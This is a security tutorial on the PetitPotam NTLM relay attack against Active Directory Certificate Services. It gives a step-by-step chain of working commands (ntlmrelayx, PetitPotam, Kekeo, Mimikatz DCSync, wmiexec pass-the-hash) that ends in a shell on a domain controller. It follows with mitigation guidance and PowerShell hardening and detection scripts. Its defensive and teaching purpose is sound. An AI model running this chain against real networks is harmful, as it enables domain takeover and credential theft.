Attack Technique 8: PetitPotam NTLM Relay Attack on Active Directory Certificate Services (AD CS)

PetitPotam NTLM Relay Attack: Overview, Execution, and Mitigation Strategies


Introduction

The PetitPotam NTLM Relay Attack exploits vulnerabilities in legacy protocols, particularly Windows NTLM authentication and the MS-EFSRPC protocol. Attackers use this method to compromise Active Directory (AD) environments, specifically targeting Active Directory Certificate Services (AD-CS) configurations that lack proper security measures.


Attack Overview

  1. Exploitation of MS-EFSRPC Protocol:

    • Attackers use PetitPotam to force a Domain Controller (DC) to authenticate via NTLM to a malicious server.

  2. NTLM Relay to AD-CS:

    • The attacker relays the captured NTLM authentication to an AD-CS Web Enrollment page to request a domain controller certificate.

  3. Certificate-Based Privilege Escalation:

    • Using the certificate, attackers obtain a Ticket Granting Ticket (TGT) for the domain controller account.

  4. Domain Compromise:

    • The TGT allows high-privilege operations, leading to full domain compromise.


Impact

  • Full Domain Compromise: Attackers gain control over sensitive domain accounts and data.

  • Privilege Escalation: Domain Controller certificates enable unauthorized high-privilege actions.

  • Persistent Threat: Certificates can be reused to maintain access.


Techniques to Perform a PetitPotam NTLM Relay Attack

Step 1: Setting Up NTLM Relay to AD-CS

Use Impacket's ntlmrelayx.py to intercept and relay NTLM authentication requests to the AD-CS Web Enrollment page.

Command:

sudo python3 ntlmrelayx.py -debug -smb2support --target http://<target-ip>/certsrv/certfnsh.asp --adcs --template KerberosAuthentication

Flags:

  • --target: Specifies the AD-CS enrollment URL.

  • --adcs: Indicates targeting an AD-CS server.

  • --template: Specifies the KerberosAuthentication template.

  • -smb2support: Enables SMBv2 connections.

Step 2: Exploiting PetitPotam Vulnerability

Trigger NTLM authentication from the Domain Controller using PetitPotam.

Command:

python3 Petitpotam.py <listener-ip> <target-ip>

  • listener-ip: Attacker's relay server.

  • target-ip: Target Domain Controller.

Result: Captured NTLM authentication forwarded to AD-CS.


Step 3: Obtaining a Ticket Granting Ticket (TGT)

With the certificate obtained, use Kekeo or Rubeus to request a TGT.

Kekeo Command:

Kekeo # tgt::ask /pfx:<base64 cert> /user:DC-101$ /domain:EXAMPLE.local /ptt

  • DC-101$: Domain Controller account.

  • ptt: Pass-the-ticket functionality.


Step 4: Performing DCSync Attack

Extract the krbtgt hash using Mimikatz.

Mimikatz Command:

lsadump::dcsync /domain:EXAMPLE.local /user:krbtgt

Result:

Hash of krbtgt: 186c026974e59a14040dbc63aa8fb8c4

Step 5: Pass-the-Hash

Use the krbtgt hash to gain access to the Domain Controller.

Impacket Command:

wmiexec.py -hashes :186c026974e59a14040dbc63aa8fb8c4 EXAMPLE/krbtgt@<target-ip>

Outcome: Interactive shell on the Domain Controller with elevated privileges.


Mitigation Techniques for PetitPotam NTLM Relay Attacks

1. Enable Extended Protection for Authentication (EPA)

EPA (channel binding) ties the NTLM authentication to the TLS channel it arrives over, so an authentication relayed from a different connection is rejected and the relay fails.

Steps:

  • Open IIS Manager.

  • Set Extended Protection for Authentication to Required.

  • Update the Web.config file of the Certificate Enrollment Web Service:

    Example:

    <extendedProtectionPolicy policyEnforcement="Always" />

2. Enforce SSL-Only Connections

Ensure all connections to the AD-CS Web Enrollment page use SSL.

Steps:

  • In IIS Manager, enable Require SSL for the Web Enrollment site.

Command:

iisreset /restart
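The two IIS settings from mitigations 1 and 2 can be audited and applied in one pass. The script below is an added example, not code from the original page or from Microsoft; it assumes Web Enrollment is installed at the default path "Default Web Site/CertSrv" and is run in an elevated PowerShell on the CA web server. The Web.config line shown under mitigation 1 belongs to the Certificate Enrollment Web Service (CES) role, a separate application; this script covers the Web Enrollment (certsrv) pages that the relay on this page targets.

```powershell
# Added example (not from the original page): audit, then enforce, Extended Protection (EPA)
# and Require SSL on the AD CS Web Enrollment application with the WebAdministration module.
# Assumption: Web Enrollment lives at the default "Default Web Site/CertSrv"; change $AppPath otherwise.
Import-Module WebAdministration

$AppPath = 'IIS:\Sites\Default Web Site\CertSrv'
$WinAuth = 'system.webServer/security/authentication/windowsAuthentication'
$ExtProt = "$WinAuth/extendedProtection"
$Access  = 'system.webServer/security/access'

function Get-IisPropertyValue {
    # Get-WebConfigurationProperty returns either a raw value or a ConfigurationAttribute
    # object, depending on the property type; normalise both to the plain value.
    param([string] $Filter, [string] $Name)
    $v = Get-WebConfigurationProperty -PSPath $AppPath -Filter $Filter -Name $Name
    if ($null -ne $v -and $null -ne $v.Value) { $v.Value } else { $v }
}

function Get-CertSrvHardeningState {
    $state = [pscustomobject]@{
        WindowsAuthEnabled = [bool](Get-IisPropertyValue $WinAuth 'enabled')
        TokenChecking      = [string](Get-IisPropertyValue $ExtProt 'tokenChecking')   # None | Allow | Require
        SslFlags           = [string](Get-IisPropertyValue $Access  'sslFlags')        # contains "Ssl" when Require SSL is on
    }
    $compliant = $state.WindowsAuthEnabled -and
                 $state.TokenChecking -eq 'Require' -and
                 (($state.SslFlags -split ',\s*') -contains 'Ssl')
    $state | Add-Member -NotePropertyName Compliant -NotePropertyValue $compliant -PassThru
}

function Set-CertSrvHardening {
    # EPA only protects authentication that happens inside TLS, so Require SSL goes on first.
    Set-WebConfigurationProperty -PSPath $AppPath -Filter $Access  -Name sslFlags      -Value 'Ssl'
    Set-WebConfigurationProperty -PSPath $AppPath -Filter $WinAuth -Name enabled       -Value $true
    Set-WebConfigurationProperty -PSPath $AppPath -Filter $ExtProt -Name tokenChecking -Value 'Require'
}

$before = Get-CertSrvHardeningState
if (-not $before.Compliant) {
    Set-CertSrvHardening
    iisreset /restart | Out-Null      # the settings take effect after the IIS restart from mitigation 2
}
Get-CertSrvHardeningState | Format-List
```

Run the audit function on its own first: a result of TokenChecking = Allow or an SslFlags value without "Ssl" is the exposed state. Setting tokenChecking to Require also breaks clients that reach the enrollment pages through a TLS-terminating proxy, so test enrollment from a domain workstation after the change.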

3. Disable NTLM Authentication Where Possible

Transition to Kerberos Authentication for services and protocols.

Steps:

  • Use Group Policy to disable NTLM:

    • Computer Configuration\Policies\Windows Settings\Security Settings\Local Policies\Security Options.

    • Configure Network Security: Restrict NTLM policies.
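Before enforcing the Restrict NTLM policies it helps to know what is currently defined and which clients still depend on NTLM. The script below is an added example, not code from the original page; it reads the registry values those Group Policy items write and summarises the NTLM audit events a domain controller records once auditing is on. The EventData field names used when parsing event 8004 are an assumption and should be checked against your own log.

```powershell
# Added example (not from the original page): inventory the "Network Security: Restrict NTLM"
# settings and the clients still authenticating with NTLM, before switching from audit to deny.
# The Group Policy items map to the registry values below; a missing value means "Not Defined".

$Policies = @(
    @{ Name = 'Restrict NTLM: NTLM authentication in this domain';       Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters'; Value = 'RestrictNTLMInDomain' }
    @{ Name = 'Restrict NTLM: Audit NTLM authentication in this domain'; Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters'; Value = 'AuditNTLMInDomain' }
    @{ Name = 'Restrict NTLM: Incoming NTLM traffic';                    Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0';           Value = 'RestrictReceivingNTLMTraffic' }
    @{ Name = 'Restrict NTLM: Audit Incoming NTLM Traffic';              Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0';           Value = 'AuditReceivingNTLMTraffic' }
    @{ Name = 'Restrict NTLM: Outgoing NTLM traffic to remote servers';  Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0';           Value = 'RestrictSendingNTLMTraffic' }
)

function Get-NtlmRestrictionState {
    # One row per policy: the raw DWORD the GPO wrote, or "Not Defined" when the value is absent.
    foreach ($p in $Policies) {
        $item = Get-ItemProperty -Path $p.Path -Name $p.Value -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Policy   = $p.Name
            Registry = "$($p.Path)\$($p.Value)"
            Value    = if ($null -ne $item) { $item.($p.Value) } else { 'Not Defined' }
        }
    }
}

function Get-NtlmClientInventory {
    # Summarise who still authenticates with NTLM against this DC, from the NTLM audit channel
    # (event 8004, written when "Audit NTLM authentication in this domain" is enabled).
    param([int] $Days = 7)
    $filter = @{ LogName = 'Microsoft-Windows-NTLM/Operational'; Id = 8004; StartTime = (Get-Date).AddDays(-$Days) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # Assumed EventData names (UserName, DomainName, WorkstationName); verify against your log.
        $data = @{}
        ([xml]$_.ToXml()).Event.EventData.Data | ForEach-Object { $data[$_.Name] = $_.'#text' }
        [pscustomobject]@{ Time = $_.TimeCreated; User = $data['UserName']; Domain = $data['DomainName']; Workstation = $data['WorkstationName'] }
    } | Group-Object Workstation, User | Sort-Object Count -Descending | Select-Object Count, Name
}

Get-NtlmRestrictionState | Format-Table -AutoSize
Get-NtlmClientInventory -Days 7 | Format-Table -AutoSize
```

Run it on each domain controller: an empty inventory after a week of auditing is the signal that the deny setting can be applied without breaking clients, and a non-empty one lists the hosts that still need moving to Kerberos.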


4. Harden AD-CS Configurations

Restrict certificate issuance by tightening AD-CS configurations.

  • Use specific templates that enforce stricter authentication.

  • Disable the KerberosAuthentication template if not required.


5. Monitor MS-EFSRPC Protocol Usage

Regularly audit usage of the EFSRPC protocol to detect unauthorized NTLM authentication triggers.
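Auditing EFSRPC usage works best when combined with the two other footprints the relay leaves: the domain controller's machine account authenticating with NTLM to the CA web server, and the CA issuing an authentication template to that machine account. The detection logic below is an added example, not code from the original page; it runs over constructed sample records so it executes offline, and the host names CA01, DC-101 and DC-102 are made up for the example.

```powershell
# Added example (not from the original page): correlate three Security events that together
# describe the relay chain on this page. Event IDs are standard; property names mirror the message text.
#   5145 (Detailed File Share auditing, on the DC): MS-EFSRPC reached through an IPC$ named pipe
#   4624 (on the CA web server): a DC machine account logging on with NTLM, the relay's own footprint
#   4887 (Certification Services auditing, on the CA): an authentication template issued to a machine account
# Constructed names: CA01 is the CA web server, DC-101 and DC-102 are the domain controllers.

$DomainControllers = @('DC-101', 'DC-102')
$EfsPipes          = @('efsrpc', 'lsarpc')   # MS-EFSRPC is bound to \pipe\efsrpc and also reachable over \pipe\lsarpc
$WatchedTemplates  = @('KerberosAuthentication', 'DomainController', 'DomainControllerAuthentication')

function Find-RelayIndicators {
    param([Parameter(Mandatory)] [object[]] $Events)
    foreach ($e in $Events) {
        switch ($e.Id) {
            5145 {
                if ($e.ShareName -like '*\IPC$' -and $EfsPipes -contains $e.RelativeTargetName) {
                    [pscustomobject]@{ Id = 5145; Severity = 'Medium'; Host = $e.Computer
                        Indicator = "pipe '$($e.RelativeTargetName)' opened from $($e.SourceAddress) as $($e.AccountName)" }
                }
            }
            4624 {
                # A domain controller's computer account has no reason to authenticate to a member
                # server with NTLM; the relay makes the CA web server record exactly that logon.
                $isDcAccount = ($e.AccountName -match '\$$') -and ($DomainControllers -contains $e.AccountName.TrimEnd('$'))
                if ($e.AuthenticationPackage -eq 'NTLM' -and $isDcAccount -and $DomainControllers -notcontains $e.Computer) {
                    [pscustomobject]@{ Id = 4624; Severity = 'High'; Host = $e.Computer
                        Indicator = "NTLM logon by DC account $($e.AccountName) from $($e.SourceAddress)" }
                }
            }
            4887 {
                if ($e.Requester -match '\$$' -and $WatchedTemplates -contains $e.Template) {
                    [pscustomobject]@{ Id = 4887; Severity = 'High'; Host = $e.Computer
                        Indicator = "template $($e.Template) issued to machine account $($e.Requester) (request $($e.RequestId))" }
                }
            }
        }
    }
}

# Constructed sample records (not real logs): one benign record per event type plus one hit each.
$SampleEvents = @(
    [pscustomobject]@{ Id = 5145; Computer = 'DC-101'; ShareName = '\\*\IPC$'; RelativeTargetName = 'srvsvc'; SourceAddress = '10.0.0.50'; AccountName = 'alice' }
    [pscustomobject]@{ Id = 5145; Computer = 'DC-101'; ShareName = '\\*\IPC$'; RelativeTargetName = 'efsrpc'; SourceAddress = '10.0.0.99'; AccountName = 'bob' }
    [pscustomobject]@{ Id = 4624; Computer = 'CA01'; AccountName = 'alice';   AuthenticationPackage = 'Kerberos'; SourceAddress = '10.0.0.50' }
    [pscustomobject]@{ Id = 4624; Computer = 'CA01'; AccountName = 'DC-101$'; AuthenticationPackage = 'NTLM';     SourceAddress = '10.0.0.99' }
    [pscustomobject]@{ Id = 4887; Computer = 'CA01'; Requester = 'EXAMPLE\alice';   Template = 'User';                   RequestId = 1041 }
    [pscustomobject]@{ Id = 4887; Computer = 'CA01'; Requester = 'EXAMPLE\DC-101$'; Template = 'KerberosAuthentication'; RequestId = 1042 }
)

# Expected: three indicators (the efsrpc pipe access, the NTLM logon by DC-101$, the issuance to DC-101$).
Find-RelayIndicators -Events $SampleEvents | Format-Table -AutoSize
```

For live data, read the events with Get-WinEvent from the Security log (5145 on the domain controllers, 4624 and 4887 on the CA) and map each event's message fields onto the property names the function expects. Event 5145 needs "Audit Detailed File Share" and is high-volume, and lsarpc is used legitimately all the time, so treat efsrpc as the alerting signal and lsarpc as context to baseline by source address; the 4624 and 4887 checks are low-noise and are the ones worth paging on.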


Conclusion

The PetitPotam NTLM Relay Attack targets legacy authentication mechanisms and misconfigured AD-CS environments, enabling attackers to achieve full domain compromise.

To mitigate this risk:

  • Enforce EPA and SSL to protect AD-CS.

  • Disable NTLM and adopt Kerberos.

  • Regularly monitor and audit protocol usage and certificate services.

By implementing these measures, organizations can effectively reduce the attack surface and protect their Active Directory environments from this sophisticated threat.
